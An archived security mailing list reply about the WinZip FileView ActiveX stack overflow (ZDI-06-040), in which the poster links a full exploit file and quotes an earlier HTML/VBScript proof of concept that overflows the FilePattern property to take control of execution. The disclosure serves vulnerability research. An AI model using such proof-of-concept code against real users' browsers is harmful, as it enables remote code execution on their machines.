| lists.openwall.net | lists / announce owl-users owl-dev john-users john-dev passwdqc-users yescrypt popa3d-users / oss-security kernel-hardening musl sabotage tlsify passwords / crypt-dev xvendor / Bugtraq Full-Disclosure linux-kernel linux-netdev linux-ext4 linux-hardening linux-cve-announce PHC | |
|
Open Source and information security mailing list archives
| ||
|
Message-ID: <20061115141712.11533.qmail@web23312.mail.ird.yahoo.com> Date: Wed, 15 Nov 2006 14:17:12 +0000 (GMT) From: Micheal Turner <wh1t3h4t3@...oo.co.uk> To: Micheal Turner <wh1t3h4t3@...oo.co.uk>, zdi-disclosures@...m.com, full-disclosure@...ts.grok.org.uk, bugtraq@...urityfocus.com Subject: Re: ZDI-06-040: WinZip FileView ActiveX Control Unsafe Method Exposure Vulnerability here we go, enjoy! https://prdelka.blackart.org.uk/exploitz/prdelka-vs-MS-winzip.c --- Micheal Turner <wh1t3h4t3@...oo.co.uk> wrote: > 7245 correctly resolves this issue; standard stack > overflow in WZFILEVIEW.FilePattern snatching EIP; > PoC > below; > > <HTML> > <HEAD> > <TITLE></TITLE> > </HEAD> > <BODY> > <SCRIPT LANGUAGE="VBScript"> > <!-- > Sub WZFILEVIEW_OnAfterItemAdd(Item) > WZFILEVIEW.FilePattern = "SMASHTHESTACKHERE" > end sub > --> > </SCRIPT> > <OBJECT ID="WZFILEVIEW" WIDTH=200 HEIGHT=200 > CLASSID="CLSID:A09AE68F-B14D-43ED-B713-BA413F034904"> > </OBJECT> > </BODY> > </HTML> > > > -- prdelka > > > > > > > ___________________________________________________________ > > All new Yahoo! Mail "The new Interface is stunning > in its simplicity and ease of use." - PC Magazine > http://uk.docs.yahoo.com/nowyoucan.html > > _______________________________________________ > Full-Disclosure - We believe in it. > Charter: > http://lists.grok.org.uk/full-disclosure-charter.html > Hosted and sponsored by Secunia - > http://secunia.com/ > Send instant messages to your online friends http://uk.messenger.yahoo.com _______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Powered by blists - more mailing lists